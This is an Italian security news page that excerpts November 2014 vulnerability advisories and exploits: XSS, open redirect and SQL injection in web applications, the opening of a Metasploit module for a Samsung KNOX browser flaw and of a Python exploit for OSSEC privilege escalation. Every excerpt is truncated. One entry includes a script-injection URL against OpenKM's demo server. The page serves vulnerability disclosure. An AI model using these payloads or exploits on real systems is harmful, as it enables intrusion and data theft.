Joomla Simple Email Form 1.8.5 Cross Site Scripting

20 novembre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23241
Product: Simple Email Form Joomla Extension
Vendor: Doug Bierer
Vulnerable Version(s): 1.8.5 and probably prior
Tested Version: 1.8.5
Advisory Publication:  October 29, 2014  [without technical details]
Vendor Notification: October 29, 2014 
Public Disclosure: November 19, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8539
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...

Leggi il seguito »

Snowfox CMS 1.0 Open Redirect

19 novembre 2014 - Fonte: http://www.mondounix.com
Snowfox CMS v1.0 (rd param) Open Redirect Vulnerability
 
 
Vendor: Globiz Solutions
Product web page: http://www.snowfoxcms.org
Affected version: 1.0
 
Summary: Snowfox is an open source Content Management System (CMS)
that allows your website users to create and share content based
on permission configurations.
 
Desc: Input passed via the 'rd' GET parameter in 'selectlanguage.class.php'
script is not properly verified before being used to redirect users. This
can be exploited to redirect a user to an arbitrary website e.g. when a user
clicks a specially crafted link to the affected script hosted on a trusted
domain.
 
===========================================================================
\modules\system\controller\selectlanguage.class.php:
----------------------------------------------------
 
28:...

Leggi il seguito »

Samsung Galaxy KNOX Android Browser Remote Code Execution

18 novembre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'digest/md5'
 
class Metasploit3 < Msf::Exploit::Remote
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  # Hash that maps payload ID -> (0|1) if an HTTP request has
  # been made to download a payload of that ID
  attr_reader :served_payloads
 
  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Samsung Galaxy KNOX Android Browser RCE',
      'Description'         => %q{
        A vulnerability exists in the KNOX security component of the Samsung Galaxy
        firmware that allows...

Leggi il seguito »

XOOPS 2.5.6 SQL Injection

18 novembre 2014 - Fonte: http://www.mondounix.com
=============================================
MGC ALERT 2014-003
- Original release date: March 6, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in XOOPS <= 2.5.6
 
II. BACKGROUND
-------------------------
XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though
started as a portal system, it later developed into a web application
framework. It aims to serve as a web framework for use by small, medium and
large sites, through the installation of modules.
 
III. DESCRIPTION
-------------------------
It...

Leggi il seguito »

Proticaret E-Commerce Script 3.0 SQL Injection

18 novembre 2014 - Fonte: http://www.mondounix.com
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
 
Release Date:
===========
13 Nov 2014
 
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
 
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
 
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014    :    Contact with Vendor
20 Nov 2014    :    Vendor Response
June 26, 2014 :    Patch Released
13 Nov 2014    :    Public Disclosure
 
Discovery Status:
=============
Published
 
Affected Product(s):
===============
Promist Bilgi Ýletiþim...

Leggi il seguito »

Pandora FMS 5.1SP1 Cross Site Scripting

18 novembre 2014 - Fonte: http://www.mondounix.com
I. VULNERABILITY
 
-------------------------
 
XSS Reflected in Page visualization agents in Pandora FMS v5.1SP1 - Revisión PC141031
 
II. BACKGROUND
Pandora FMS is the monitoring software chosen by several companies all around the world for managing their IT infrastructure. Besides ensuring high performance and maximum flexibility, it has aIII.
 
DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in Pandora FMS in page visualization agents, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.
 
The code injection is done through the parameter "refr" in the page “/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=”
 
IV....

Leggi il seguito »

Openkm Document Management System 6.4.17 Cross Site Scripting

18 novembre 2014 - Fonte: http://www.mondounix.com
Openkm Document Management System Suffers From Cross Site Scripting Attack
 
http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabili
ties/openkm.jpg
 
Version <=6.4.17
Software Test http://demo.openkm.com/OpenKM/login.jsp
Auther :  <https://www.facebook.com/khalil.shr> Khalil
<https://www.facebook.com/khalil.shr> Shreateh
 
Auther Website: http://khalil-shreateh.com
Status : Reported .
Report Link : http://issues.openkm.com/view.php?id=3056
 
Attack Description
 
log in with any user
Navigate to :
<http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Eale
rt%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
>
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealer
t%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
 
 
 
POC...

Leggi il seguito »

Nibbleblog 4.0.1 Cross Site Scripting

18 novembre 2014 - Fonte: http://www.mondounix.com
=============================================
MGC ALERT 2014-002
- Original release date: March 5, 2014
- Last revised:  November 17, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Reflected XSS in Nibbleblog <= v4.0.1
 
II. BACKGROUND
-------------------------
Nibbleblog is a powerful engine for creating blogs, all you need is PHP to
work.
 
III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in Nibbleblog, that allows
the execution of arbitrary HTML/script code to be executed in the context
of the victim user's browser.
 
The code injection...

Leggi il seguito »

OSSEC 2.8 Privilege Escalation

16 novembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
# Date: 14-11-14
# Exploit Author: skynet-13
# Vendor Homepage: www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC  - 2.8
# Tested on: Ubunutu x86_64
# CVE : 2014-5284
 
# Created from Research by
# Jeff Petersen
# Roka Security LLC
# jpetersen@rokasecurity.com
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1
 
# Run this on target machine and follow instructions to execute command as root
 
from twisted.internet import inotify
from twisted.python import filepath
from twisted.internet import reactor
import os
import optparse
import...

Leggi il seguito »

Gogs Repository Search SQL Injection

16 novembre 2014 - Fonte: http://www.mondounix.com
Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])
 
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.
 
Gogs provides an api view to give javascript code the possibility to
search for
existing repositories in the system. This view is accessible at
/api/v1/repos/search?q=<search...

Leggi il seguito »